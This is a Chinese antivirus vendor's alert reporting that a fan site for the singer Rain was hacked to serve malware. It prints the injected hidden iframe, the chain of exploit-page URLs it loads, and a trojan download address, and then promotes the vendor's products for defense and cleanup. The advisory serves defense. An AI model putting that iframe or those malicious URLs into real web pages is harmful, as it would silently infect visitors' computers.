3月17日晚截获金山云安全中心截获Rain(郑智薰)中文网 - 云亲最喜欢去的Rain网站被黑客挂马。
Rain(郑智薰)中文网地址:hxxp://www.raincn.com/
被植入恶意代码<iframe src=hxxp://www.sgyh6699.cn/llsg/12.htm width=50 height=0 border=0></iframe>
截获被挂马如图:
挂马分析:
[wide]http://www.raincn.com/
[frame]http://www.sgyh6699.cn/llsg/12.htm
[frame]http://www.fc5656.cn/a128/fxx.htm
[frame]http://www.fc5656.cn/a128/fx.htm
[frame]http://www.fc5656.cn/a128/../a1/ss.htm
[frame]http://www.fc5656.cn/a128/../a1/MS06014.htm
[frame]http://www.fc5656.cn/a128/../a1/sina.htm
[frame]http://www.fc5656.cn/a128/../a1/no.htm
[frame]http://www.fc5656.cn/a128/../a1/bfyy.htm
[frame]http://www.fc5656.cn/a128/../a1/GLWORLD.html
[frame]http://www.fc5656.cn/a128/../a1/real.htm
[frame]http://www.fc5656.cn/a128/../a1/real.hTml
下载木马地址:hxxp://d.wixww.com:88/new/a1..css
毒霸命名为:Win32.Troj.Agent.yz.57344 (猫癣下载器)
为了应对层出不穷的恶意网站,金山安全中心建议:
防御方案:
1.安装金山毒霸2009升级到最新版本病毒库,开启文件实时监控即可防御该病毒入侵系统
2.安装免费的金山网盾可以很好的防御现有漏洞攻击方式,护航网络冲浪
查杀方案:
1.如果你的电脑已经中招,可以下载免费的金山病毒急救箱并升级到最新版本进行未知木马清除;
2.安装金山毒霸2009升级到最新版本病毒库,进行查杀。
网友评论